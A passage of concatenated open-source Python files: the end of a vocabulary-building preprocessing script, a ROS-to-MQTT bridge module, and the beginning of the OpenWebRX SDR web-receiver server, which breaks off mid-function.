out_file.close()
# If it's train file, make vocab
if file_name == 'train.from' or file_name == 'train.to':
# if file_name == 'train.from':
print("\nFile: {} (saving vocab)".format(file_name.replace('train', 'vocab')))
# Get most common entities
vocab = [entity for entity, v in vocab.most_common()]
# Do replacements
new_vocab = [replace_in_answers([entity], 'vocab')[0] for entity in vocab]
# Filter out duplicates and empty entities
vocab = set()
vocab = [entity for entity in new_vocab if not (entity in vocab or vocab.add(entity)) and entity]
# Write entities to a file
with open('{}/{}'.format(preprocessing['train_folder'], file_name.replace('train', 'vocab')), 'w',
encoding='utf-8', buffering=131072) as vocab_file:
vocab_file.write("<unk>\n<s>\n</s>\n" + "\n".join(vocab[:preprocessing['vocab_size']]))
with open('{}/{}'.format(preprocessing['train_folder'], file_name.replace('train', 'vocab_unused')), 'w',
encoding='utf-8', buffering=131072) as vocab_file:
vocab_file.write("\n".join(vocab[preprocessing['vocab_size']:]))
# Helper function, reads 'amount' number of lines from file handler
def read_lines(file, amount, fillvalue=None):
args = [iter(file)] * amount
return zip_longest(*args, fillvalue=fillvalue)
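# --- Added note (illustration only, not part of the original script) ---
# read_lines() groups the file iterator into fixed-size batches, padding the
# last batch with `fillvalue`, e.g.:
#   list(read_lines(iter(['a', 'b', 'c']), 2, ''))  ->  [('a', 'b'), ('c', '')]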
# Write a batch of lines to a file
def write_lines(file, lines):
# Handling empty lines (described above)
last = False
if not len(lines) or lines[-1] == '':
lines = list(filter(None, list(lines)))
last = True
file.write('\n'.join(lines) + ('' if last else '\n'))
# Append tokens to vocab
def append_vocab(lines, thread):
global vocab
# Split lines for that vocab thread
local_vocab = []
if thread == 1:
lines = lines[:5000]
else:
lines = lines[5000:]
# Add entities
for line in lines:
local_vocab.extend(line.split(' '))
# Add entities to vocab
vocab.update(local_vocab)
# Prepare training data set
if __name__ == "__main__":
prepare()
|
bridge.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
import inject
import paho.mqtt.client as mqtt
import rospy
from .util import lookup_object, extract_values, populate_instance
from threading import Condition
from queue import Queue
from uuid import uuid4
from threading import Thread
def create_bridge(factory, **kwargs):
u""" bridge generator function
:param (str|class) factory: Bridge class
:param kwargs: bridge-specific arguments
:return Bridge: bridge object
"""
if isinstance(factory, basestring):
factory = lookup_object(factory)
if not issubclass(factory, Bridge):
raise ValueError("factory should be Bridge subclass")
return factory(**kwargs)
class Bridge(object):
u""" Bridge base class
:param mqtt.Client _mqtt_client: MQTT client
:param _serialize: message serialize callable
:param _deserialize: message deserialize callable
"""
__metaclass__ = ABCMeta
_mqtt_client = inject.attr(mqtt.Client)
_serialize = inject.attr('serializer')
_deserialize = inject.attr('deserializer')
_extract_private_path = inject.attr('mqtt_private_path_extractor')
class DynamicBridgeServer(Bridge):
u""" Dynamic Bridge Server that serves as the remote end to PublishBridge
and SubscribeBridge, as well as the RemoteService. Should always be instantiated if
indeed the purpose is bridging between ROS-sides.
"""
def __init__(self, control_topic="__dynamic_server"):
self._control_topic = control_topic + '/topic/#'
self._service_topic = control_topic + '/service/request/#'
self._register_service_topic = control_topic + '/service/register/#'
self._mqtt_client.subscribe(self._control_topic, qos=2)
self._mqtt_client.message_callback_add(self._control_topic, self._callback_mqtt_topic)
self._mqtt_client.subscribe(self._service_topic, qos=2)
self._mqtt_client.message_callback_add(self._service_topic, self._callback_mqtt_service)
self._mqtt_client.subscribe(self._register_service_topic, qos=2)
self._mqtt_client.message_callback_add(self._register_service_topic, self._register_service)
self._bridges = set([])
rospy.loginfo('DynamicBridgeServer started on control topic %s' % control_topic)
def _callback_mqtt_service(self, client, userdata, mqtt_msg):
t = Thread(target=self.__callback_mqtt_service, args=(userdata, mqtt_msg))
t.start()
def __callback_mqtt_service(self, userdata, mqtt_msg):
rospy.logdebug("MQTT service call received from {}".format(mqtt_msg.topic))
msg_dict = self._deserialize(mqtt_msg.payload)
service_type = lookup_object(msg_dict['type'])
request_type = lookup_object(msg_dict['type'] + 'Request')
# create request object
request = request_type()
# and populate it
populate_instance(msg_dict['args'], request)
response_type = lookup_object(msg_dict['type'] + 'Response')
# create empty response object
response = response_type()
msg_dict['op'] = 'response'
try:
rospy.logdebug('waiting for service %s' % msg_dict['service'])
rospy.wait_for_service(msg_dict['service'], 1)
service = rospy.ServiceProxy(msg_dict['service'], service_type)
response = service.call(request)
msg_dict['response'] = extract_values(response)
except Exception:
rospy.logerr("Service %s doesn't exist" % msg_dict['service'])
msg_dict['response'] = None
finally:
payload = bytearray(self._serialize(msg_dict))
self._mqtt_client.publish(
topic=msg_dict['response_topic'], payload=payload,
qos=2, retain=False)
def _register_service(self, client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
if msg_dict['op'] == 'register':
rospy.loginfo("register service proxy")
self._bridges.add(RemoteService(
**msg_dict['args'])
)
def _callback_mqtt_topic(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
def __bridge_exists(args):
for __bridge in self._bridges:
if __bridge._topic_from == args['topic_to'] and\
__bridge._topic_to == args['topic_from']:
return True
return False
if msg_dict['op'] == 'mqtt2ros_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward mqtt topic to ros %s" % (
msg_dict['args']))
self._bridges.add(MqttToRosBridge(
**msg_dict['args'])
)
else:
rospy.loginfo("bridge for %s already initialised" % (
msg_dict['args']))
if msg_dict['op'] == 'ros2mqtt_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward ros topic to mqtt %s" % (
msg_dict['args']))
self._bridges.add(RosToMqttBridge(
**msg_dict['args'])
)
else:
rospy.logwarn("bridge for %s already initialised" % (
msg_dict['args']))
class RosToMqttBridge(Bridge):
u""" Bridge from ROS topic to MQTT
:param str topic_from: incoming ROS topic path
:param str topic_to: outgoing MQTT topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param bool latched: retain the last message on the MQTT topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None, latched=False, qos=0):
self._topic_from = topic_from
self._topic_to = self._extract_private_path(topic_to)
self._last_published = rospy.get_time()
self._interval = 0 if frequency is None else 1.0 / frequency
self._latched = latched
self._qos = qos
if isinstance(msg_type, basestring):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
            raise TypeError(
                "msg_type should be rospy.Message instance or its string "
                "representation")
rospy.Subscriber(topic_from, msg_type, self._callback_ros)
def _callback_ros(self, msg):
rospy.logdebug("ROS received from {}".format(self._topic_from))
now = rospy.get_time()
if now - self._last_published >= self._interval:
self._publish(msg)
self._last_published = now
def _publish(self, msg):
payload = bytearray(self._serialize(extract_values(msg)))
self._mqtt_client.publish(
topic=self._topic_to, payload=payload,
qos=self._qos, retain=self._latched)
class MqttToRosBridge(Bridge):
u""" Bridge from MQTT to ROS topic
:param str topic_from: incoming MQTT topic path
:param str topic_to: outgoing ROS topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param int queue_size: ROS publisher's queue size (default: 10)
:param bool latch: latch the ROS topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None,
queue_size=10, latched=False, qos=0):
self._topic_from = self._extract_private_path(topic_from)
self._topic_to = topic_to
if isinstance(msg_type, basestring):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
            raise TypeError(
                "msg_type should be rospy.Message instance or its string "
                "representation")
self._msg_type = msg_type
self._queue_size = queue_size
self._latched = latched
self._qos = qos
self._last_published = rospy.get_time()
self._interval = None if frequency is None else 1.0 / frequency
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(self._topic_from, qos=self._qos)
self._mqtt_client.message_callback_add(self._topic_from, self._callback_mqtt)
self._publisher = rospy.Publisher(
self._topic_to, self._msg_type, queue_size=self._queue_size, latch=self._latched)
def _callback_mqtt(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
rospy.logdebug("MQTT received from {}".format(mqtt_msg.topic))
now = rospy.get_time()
if self._interval is None or now - self._last_published >= self._interval:
try:
ros_msg = self._create_ros_message(mqtt_msg)
self._publisher.publish(ros_msg)
self._last_published = now
except Exception as e:
rospy.logerr(e)
def _create_ros_message(self, mqtt_msg):
u""" create ROS message from MQTT payload
:param mqtt.Message mqtt_msg: MQTT Message
:return rospy.Message: ROS Message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
return populate_instance(msg_dict, self._msg_type())
class SubscribeBridge(MqttToRosBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_from.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
        super(SubscribeBridge, self).__init__(self._mqtt_topic, topic_to, msg_type,
                                              frequency=frequency, latched=latched, qos=qos)
rospy.loginfo('SubscribeBridge: subscribe ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'ros2mqtt_subscribe',
'args': {
'topic_from': topic_from,
'topic_to': self._mqtt_topic,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=True)
class PublishBridge(RosToMqttBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_to.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(PublishBridge, self).__init__(topic_from, self._mqtt_topic, msg_type, frequency, latched, qos)
rospy.loginfo('PublishBridge: publish from ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'mqtt2ros_subscribe',
'args': {
'topic_from': self._mqtt_topic,
'topic_to': topic_to,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=True)
class LocalServiceProxy(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._register_service_topic = control_topic + '/service/register/' + (local_server + "_TO_" + remote_server).replace('/','_')
rospy.loginfo('LocalServiceProxy: offer remote access to ROS service %s as %s via MQTT' %
(local_server, remote_server)
)
cmd = {
'op': 'register',
'args': {
'local_server': remote_server,
'remote_server': local_server,
'srv_type': srv_type,
'control_topic': control_topic
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._register_service_topic, payload=payload,
qos=2, retain=True)
class RemoteService(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._local_server = local_server
self._remote_server = remote_server
self._control_topic = control_topic
self._mqtt_topic_request = self._control_topic + '/service/request/' + (local_server + "_TO_" + remote_server).replace('/','_')
self._srv_type_name = srv_type
self._srv_type = lookup_object(self._srv_type_name)
self._serviceproxy = rospy.Service(self._local_server, self._srv_type, self._ros_handler)
def _ros_handler(self, req):
responses = {}
lock = Condition()
def __response_handler(client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
rospy.logdebug('got response for %s' % msg_dict['id'])
with lock:
responses[msg_dict['id']] = msg_dict['response']
lock.notifyAll()
rospy.logdebug('local service %s called.' % self._local_server)
# generate a unique ID
request_id = str(uuid4())
# build a request to send to the external client
request_message = {
"op": "call_service",
"id": request_id,
"response_topic": self._control_topic + '/service/response/' + request_id,
"type": self._srv_type_name,
"service": self._remote_server,
"args": extract_values(req)
}
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(request_message['response_topic'], qos=2)
self._mqtt_client.message_callback_add(request_message['response_topic'], __response_handler)
payload = bytearray(self._serialize(request_message))
self._mqtt_client.publish(
topic=self._mqtt_topic_request, payload=payload,
qos=2, retain=False)
# wait for a response
while not rospy.is_shutdown() and request_id not in responses.keys():
with lock:
lock.wait(1) # check for shutdown every 1 second
resp = responses[request_id]
del responses[request_id]
self._mqtt_client.unsubscribe(request_message['response_topic'])
# assemble response object
response_type = lookup_object(self._srv_type_name+"Response")
# create response object
r = response_type()
# and populate it
if resp is None:
rospy.logerr('Service Request could not be completed')
raise rospy.ROSException('Service Request could not be completed')
populate_instance(resp, r)
return r
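# --- Added note (illustration only, not part of the original module) ---
# Remote service flow, as implemented above: RemoteService registers a local ROS
# service and, when it is called, publishes the request (tagged with a uuid and a
# per-request response topic) on <control_topic>/service/request/...;
# DynamicBridgeServer on the other side calls the real ROS service and publishes
# the result on that response topic, where RemoteService waits on a Condition.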
__all__ = [
'create_bridge', 'Bridge', 'RosToMqttBridge', 'MqttToRosBridge',
'DynamicBridgeServer', 'SubscribeBridge', 'PublishBridge', 'RemoteService', 'LocalServiceProxy']
|
openwebrx.py
|
#!/usr/bin/python2.7
print "" # python2.7 is required to run OpenWebRX instead of python3. Please run me by: python2 openwebrx.py
"""
This file is part of OpenWebRX,
an open-source SDR receiver software with a web UI.
Copyright (c) 2013-2015 by Andras Retzler <randras@sdr.hu>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
sw_version="v0.17"
#0.15 (added nmux)
import os
import code
import importlib
import csdr
import thread
import time
import datetime
import subprocess
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
import fcntl
import time
import md5
import random
import threading
import sys
import traceback
from collections import namedtuple
import Queue
import ctypes
#import rtl_mus
import rxws
import uuid
import signal
import socket
try: import sdrhu
except: sdrhu=False
avatar_ctime=""
#pypy compatibility
try: import dl
except: pass
try: import __pypy__
except: pass
pypy="__pypy__" in globals()
"""
def import_all_plugins(directory):
for subdir in os.listdir(directory):
if os.path.isdir(directory+subdir) and not subdir[0]=="_":
exact_path=directory+subdir+"/plugin.py"
if os.path.isfile(exact_path):
importname=(directory+subdir+"/plugin").replace("/",".")
print "[openwebrx-import] Found plugin:",importname
importlib.import_module(importname)
"""
class MultiThreadHTTPServer(ThreadingMixIn, HTTPServer):
pass
def handle_signal(sig, frame):
global spectrum_dsp
if sig == signal.SIGUSR1:
print "[openwebrx] Verbose status information on USR1 signal"
print
print "time.time() =", time.time()
print "clients_mutex.locked() =", clients_mutex.locked()
print "clients_mutex_locker =", clients_mutex_locker
if server_fail: print "server_fail = ", server_fail
print "spectrum_thread_watchdog_last_tick =", spectrum_thread_watchdog_last_tick
print
print "clients:",len(clients)
for client in clients:
print
for key in client._fields:
print "\t%s = %s"%(key,str(getattr(client,key)))
elif sig == signal.SIGUSR2:
code.interact(local=globals())
else:
print "[openwebrx] Ctrl+C: aborting."
cleanup_clients(True)
spectrum_dsp.stop()
os._exit(1) #not too graceful exit
def access_log(data):
global logs
logs.access_log.write("["+datetime.datetime.now().isoformat()+"] "+data+"\n")
logs.access_log.flush()
receiver_failed=spectrum_thread_watchdog_last_tick=rtl_thread=spectrum_dsp=server_fail=None
def main():
global clients, clients_mutex, pypy, lock_try_time, avatar_ctime, cfg, logs
global serverfail, rtl_thread
print
print "OpenWebRX - Open Source SDR Web App for Everyone! | for license see LICENSE file in the package"
print "_________________________________________________________________________________________________"
print
print "Author contact info: Andras Retzler, HA7ILM <randras@sdr.hu>"
print
no_arguments=len(sys.argv)==1
if no_arguments: print "[openwebrx-main] Configuration script not specified. I will use: \"config_webrx.py\""
cfg=__import__("config_webrx" if no_arguments else sys.argv[1])
for option in ("access_log","csdr_dynamic_bufsize","csdr_print_bufsizes","csdr_through"):
if not option in dir(cfg): setattr(cfg, option, False) #initialize optional config parameters
#Open log files
logs = type("logs_class", (object,), {"access_log":open(cfg.access_log if cfg.access_log else "/dev/null","a"), "error_log":""})()
#Set signal handler
signal.signal(signal.SIGINT, handle_signal) #http://stackoverflow.com/questions/1112343/how-do-i-capture-sigint-in-python
signal.signal(signal.SIGUSR1, handle_signal)
signal.signal(signal.SIGUSR2, handle_signal)
#Pypy
if pypy: print "pypy detected (and now something completely different: c code is expected to run at a speed of 3*10^8 m/s?)"
#Change process name to "openwebrx" (to be seen in ps)
try:
for libcpath in ["/lib/i386-linux-gnu/libc.so.6","/lib/libc.so.6"]:
if os.path.exists(libcpath):
libc = dl.open(libcpath)
libc.call("prctl", 15, "openwebrx", 0, 0, 0)
break
except:
pass
#Start rtl thread
if os.system("csdr 2> /dev/null") == 32512: #check for csdr
print "[openwebrx-main] You need to install \"csdr\" to run OpenWebRX!\n"
return
if os.system("nmux --help 2> /dev/null") == 32512: #check for nmux
print "[openwebrx-main] You need to install an up-to-date version of \"csdr\" that contains the \"nmux\" tool to run OpenWebRX! Please upgrade \"csdr\"!\n"
return
if cfg.start_rtl_thread:
nmux_bufcnt = nmux_bufsize = 0
while nmux_bufsize < cfg.samp_rate/4: nmux_bufsize += 4096
while nmux_bufsize * nmux_bufcnt < cfg.nmux_memory * 1e6: nmux_bufcnt += 1
if nmux_bufcnt == 0 or nmux_bufsize == 0:
print "[openwebrx-main] Error: nmux_bufsize or nmux_bufcnt is zero. These depend on nmux_memory and samp_rate options in config_webrx.py"
return
print "[openwebrx-main] nmux_bufsize = %d, nmux_bufcnt = %d" % (nmux_bufsize, nmux_bufcnt)
cfg.start_rtl_command += "| nmux --bufsize %d --bufcnt %d --port %d --address 127.0.0.1" % (nmux_bufsize, nmux_bufcnt, cfg.iq_server_port)
rtl_thread=threading.Thread(target = lambda:subprocess.Popen(cfg.start_rtl_command, shell=True), args=())
rtl_thread.start()
print "[openwebrx-main] Started rtl_thread: "+cfg.start_rtl_command
print "[openwebrx-main] Waiting for I/Q server to start..."
while True:
testsock=socket.socket()
try: testsock.connect(("127.0.0.1", cfg.iq_server_port))
except:
time.sleep(0.1)
continue
testsock.close()
break
print "[openwebrx-main] I/Q server started."
#Initialize clients
clients=[]
clients_mutex=threading.Lock()
lock_try_time=0
#Start watchdog thread
print "[openwebrx-main] Starting watchdog threads."
mutex_test_thread=threading.Thread(target = mutex_test_thread_function, args = ())
mutex_test_thread.start()
mutex_watchdog_thread=threading.Thread(target = mutex_watchdog_thread_function, args = ())
mutex_watchdog_thread.start()
#Start spectrum thread
print "[openwebrx-main] Starting spectrum thread."
spectrum_thread=threading.Thread(target = spectrum_thread_function, args = ())
spectrum_thread.start()
#spectrum_watchdog_thread=threading.Thread(target = spectrum_watchdog_thread_function, args = ())
#spectrum_watchdog_thread.start()
get_cpu_usage()
bcastmsg_thread=threading.Thread(target = bcastmsg_thread_function, args = ())
bcastmsg_thread.start()
#threading.Thread(target = measure_thread_function, args = ()).start()
#Start sdr.hu update thread
if sdrhu and cfg.sdrhu_key and cfg.sdrhu_public_listing:
print "[openwebrx-main] Starting sdr.hu update thread..."
avatar_ctime=str(os.path.getctime("htdocs/gfx/openwebrx-avatar.png"))
sdrhu_thread=threading.Thread(target = sdrhu.run, args = ())
sdrhu_thread.start()
#Start HTTP thread
httpd = MultiThreadHTTPServer(('', cfg.web_port), WebRXHandler)
print('[openwebrx-main] Starting HTTP server.')
access_log("Starting OpenWebRX...")
httpd.serve_forever()
# This is a debug function below:
measure_value=0
def measure_thread_function():
global measure_value
while True:
print "[openwebrx-measure] value is",measure_value
measure_value=0
time.sleep(1)
def bcastmsg_thread_function():
global clients
while True:
time.sleep(3)
try: cpu_usage=get_cpu_usage()
except: cpu_usage=0
cma("bcastmsg_thread")
for i in range(0,len(clients)):
clients[i].bcastmsg="MSG cpu_usage={0} clients={1}".format(int(cpu_usage*100),len(clients))
cmr()
def mutex_test_thread_function():
global clients_mutex, lock_try_time
while True:
time.sleep(0.5)
lock_try_time=time.time()
clients_mutex.acquire()
clients_mutex.release()
lock_try_time=0
def cma(what): #clients_mutex acquire
global clients_mutex
global clients_mutex_locker
if not clients_mutex.locked(): clients_mutex_locker = what
clients_mutex.acquire()
def cmr():
global clients_mutex
global clients_mutex_locker
clients_mutex_locker = None
clients_mutex.release()
def mutex_watchdog_thread_function():
global lock_try_time
global clients_mutex_locker
global clients_mutex
while True:
if lock_try_time != 0 and time.time()-lock_try_time > 3.0:
#if 3 seconds pass without unlock
print "[openwebrx-mutex-watchdog] Mutex unlock timeout. Locker: \""+str(clients_mutex_locker)+"\" Now unlocking..."
clients_mutex.release()
time.sleep(0.5)
def spectrum_watchdog_thread_function():
global spectrum_thread_watchdog_last_tick, receiver_failed
while True:
time.sleep(60)
if spectrum_thread_watchdog_last_tick and time.time()-spectrum_thread_watchdog_last_tick > 60.0:
print "[openwebrx-spectrum-watchdog] Spectrum timeout. Seems like no I/Q data is coming from the receiver.\nIf you're using RTL-SDR, the receiver hardware may randomly fail under some circumstances:\n1) high temperature,\n2) insufficient current available from the USB port."
print "[openwebrx-spectrum-watchdog] Deactivating receiver."
receiver_failed="spectrum"
return
def check_server():
global spectrum_dsp, server_fail, rtl_thread
if server_fail: return server_fail
#print spectrum_dsp.process.poll()
if spectrum_dsp and spectrum_dsp.process.poll()!=None: server_fail = "spectrum_thread dsp subprocess failed"
#if rtl_thread and not rtl_thread.is_alive(): server_fail = "rtl_thread failed"
if server_fail: print "[openwebrx-check_server] >>>>>>> ERROR:", server_fail
return server_fail
def apply_csdr_cfg_to_dsp(dsp):
dsp.csdr_dynamic_bufsize = cfg.csdr_dynamic_bufsize
dsp.csdr_print_bufsizes = cfg.csdr_print_bufsizes
dsp.csdr_through = cfg.csdr_through
def spectrum_thread_function():
global clients, spectrum_dsp, spectrum_thread_watchdog_last_tick
spectrum_dsp=dsp=csdr.dsp()
dsp.nc_port=cfg.iq_server_port
dsp.set_demodulator("fft")
dsp.set_samp_rate(cfg.samp_rate)
dsp.set_fft_size(cfg.fft_size)
dsp.set_fft_fps(cfg.fft_fps)
dsp.set_fft_averages(int(round(1.0 * cfg.samp_rate / cfg.fft_size / cfg.fft_fps / (1.0 - cfg.fft_voverlap_factor))) if cfg.fft_voverlap_factor>0 else 0)
dsp.set_fft_compression(cfg.fft_compression)
dsp.set_format_conversion(cfg.format_conversion)
apply_csdr_cfg_to_dsp(dsp)
sleep_sec=0.87/cfg.fft_fps
print "[openwebrx-spectrum] Spectrum thread initialized successfully."
dsp.start()
if cfg.csdr_dynamic_bufsize:
dsp.read(8) #dummy read to skip bufsize & preamble
print "[openwebrx-spectrum] Note: CSDR_DYNAMIC_BUFSIZE_ON = 1"
print "[openwebrx-spectrum] Spectrum thread started."
bytes_to_read=int(dsp.get_fft_bytes_to_read())
spectrum_thread_counter=0
while True:
data=dsp.read(bytes_to_read)
#print "gotcha",len(data),"bytes of spectrum data via spectrum_thread_function()"
if spectrum_thread_counter >= cfg.fft_fps:
spectrum_thread_counter=0
spectrum_thread_watchdog_last_tick = time.time() #once every second
else: spectrum_thread_counter+=1
cma("spectrum_thread")
correction=0
for i in range(0,len(clients)):
i-=correction
if (clients[i].ws_started):
if clients[i].spectrum_queue.full():
print "[openwebrx-spectrum] client spectrum queue full, closing it."
close_client(i, False)
correction+=1
else:
clients[i].spectrum_queue.put([data]) # add new string by "reference" to all clients
cmr()
def get_client_by_id(client_id, use_mutex=True):
global clients
output=-1
if use_mutex: cma("get_client_by_id")
for i in range(0,len(clients)):
if(clients[i].id==client_id):
output=i
break
if use_mutex: cmr()
if output==-1:
raise ClientNotFoundException
else:
return output
def log_client(client, what):
print "[openwebrx-httpd] client {0}#{1} :: {2}".format(client.ip,client.id,what)
def cleanup_clients(end_all=False):
# - if a client doesn't open websocket for too long time, we drop it
# - or if end_all is true, we drop all clients
global clients
cma("cleanup_clients")
correction=0
for i in range(0,len(clients)):
i-=correction
#print "cleanup_clients:: len(clients)=", len(clients), "i=", i
if end_all or ((not clients[i].ws_started) and (time.time()-clients[i].gen_time)>45):
if not end_all: print "[openwebrx] cleanup_clients :: client timeout to open WebSocket"
close_client(i, False)
correction+=1
cmr()
def generate_client_id(ip):
#add a client
global clients
new_client=namedtuple("ClientStruct", "id gen_time ws_started sprectum_queue ip closed bcastmsg dsp loopstat")
new_client.id=md5.md5(str(random.random())).hexdigest()
new_client.gen_time=time.time()
new_client.ws_started=False # to check whether client has ever tried to open the websocket
new_client.spectrum_queue=Queue.Queue(1000)
new_client.ip=ip
new_client.bcastmsg=""
new_client.closed=[False] #byref, not exactly sure if required
new_client.dsp=None
cma("generate_client_id")
clients.append(new_client)
log_client(new_client,"client added. Clients now: {0}".format(len(clients)))
cmr()
cleanup_clients()
return new_client.id
def close_client(i, use_mutex=True):
global clients
log_client(clients[i],"client being closed.")
if use_mutex: cma("close_client")
try:
clients[i].dsp.stop()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "[openwebrx] close_client dsp.stop() :: error -",exc_type,exc_value
traceback.print_tb(exc_traceback)
clients[i].closed[0]=True
access_log("Stopped streaming to client: "+clients[i].ip+"#"+str(clients[i].id)+" (users now: "+str(len(clients)-1)+")")
del clients[i]
if use_mutex: cmr()
# http://www.codeproject.com/Articles/462525/Simple-HTTP-Server-and-Client-in-Python
# some ideas are used from the article above
class WebRXHandler(BaseHTTPRequestHandler):
def proc_read_thread():
pass
def send_302(self,what):
self.send_response(302)
self.send_header('Content-type','text/html')
self.send_header("Location", "http://{0}:{1}/{2}".format(cfg.server_hostname,cfg.web_port,what))
self.end_headers()
self.wfile.write("<html><body><h1>Object moved</h1>Please <a href=\"/{0}\">click here</a> to continue.</body></html>".format(what))
def do_GET(self):
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
global dsp_plugin, clients_mutex, clients, avatar_ctime, sw_version, receiver_failed
rootdir = 'htdocs'
self.path=self.path.replace("..","")
path_temp_parts=self.path.split("?")
self.path=path_temp_parts[0]
request_param=path_temp_parts[1] if(len(path_temp_parts)>1) else ""
access_log("GET "+self.path+" from "+self.client_address[0])
try:
if self.path=="/":
self.path="/index.wrx"
# there's even another cool tip at http://stackoverflow.com/questions/4419650/how-to-implement-timeout-in-basehttpserver-basehttprequesthandler-python
#if self.path[:5]=="/lock": cma("do_GET /lock/") # to test mutex_watchdog_thread. Do not uncomment in production environment!
if self.path[:4]=="/ws/":
print "[openwebrx-ws] Client requested WebSocket connection"
if receiver_failed: self.send_error(500,"Internal server error")
try:
# ========= WebSocket handshake =========
ws_success=True
try:
rxws.handshake(self)
cma("do_GET /ws/")
client_i=get_client_by_id(self.path[4:], False)
myclient=clients[client_i]
except rxws.WebSocketException: ws_success=False
except ClientNotFoundException: ws_success=False
finally:
if clients_mutex.locked(): cmr()
if not ws_success:
self.send_error(400, 'Bad request.')
return
# ========= Client handshake =========
if myclient.ws_started:
print "[openwebrx-httpd] error: second WS connection with the same client id, throwing it."
self.send_error(400, 'Bad request.') #client already started
return
rxws.send(self, "CLIENT DE SERVER openwebrx.py")
client_ans=rxws.recv(self, True)
if client_ans[:16]!="SERVER DE CLIENT":
rxws.send("ERR Bad answer.")
return
myclient.ws_started=True
#send default parameters
rxws.send(self, "MSG center_freq={0} bandwidth={1} fft_size={2} fft_fps={3} audio_compression={4} fft_compression={5} max_clients={6} setup".format(str(cfg.shown_center_freq),str(cfg.samp_rate),cfg.fft_size,cfg.fft_fps,cfg.audio_compression,cfg.fft_compression,cfg.max_clients))
# ========= Initialize DSP =========
dsp=csdr.dsp()
dsp_initialized=False
dsp.set_audio_compression(cfg.audio_compression)
dsp.set_fft_compression(cfg.fft_compression) #used by secondary chains
dsp.set_format_conversion(cfg.format_conversion)
dsp.set_offset_freq(0)
dsp.set_bpf(-4000,4000)
dsp.set_secondary_fft_size(cfg.digimodes_fft_size)
dsp.nc_port=cfg.iq_server_port
apply_csdr_cfg_to_dsp(dsp)
myclient.dsp=dsp
do_secondary_demod=False
access_log("Started streaming to client: "+self.client_address[0]+"#"+myclient.id+" (users now: "+str(len(clients))+")")
while True:
myclient.loopstat=0
if myclient.closed[0]:
print "[openwebrx-httpd:ws] client closed by other thread"
break
# ========= send audio =========
if dsp_initialized:
myclient.loopstat=10
temp_audio_data=dsp.read(256)
myclient.loopstat=11
rxws.send(self, temp_audio_data, "AUD ")
# ========= send spectrum =========
while not myclient.spectrum_queue.empty():
myclient.loopstat=20
spectrum_data=myclient.spectrum_queue.get()
#spectrum_data_mid=len(spectrum_data[0])/2
#rxws.send(self, spectrum_data[0][spectrum_data_mid:]+spectrum_data[0][:spectrum_data_mid], "FFT ")
# (it seems GNU Radio exchanges the first and second part of the FFT output, we correct it)
myclient.loopstat=21
rxws.send(self, spectrum_data[0],"FFT ")
# ========= send smeter_level =========
smeter_level=None
while True:
try:
myclient.loopstat=30
smeter_level=dsp.get_smeter_level()
if smeter_level == None: break
except:
break
if smeter_level!=None:
myclient.loopstat=31
rxws.send(self, "MSG s={0}".format(smeter_level))
# ========= send bcastmsg =========
if myclient.bcastmsg!="":
myclient.loopstat=40
rxws.send(self,myclient.bcastmsg)
myclient.bcastmsg=""
# ========= send secondary =========
if do_secondary_demod:
myclient.loopstat=41
while True:
try:
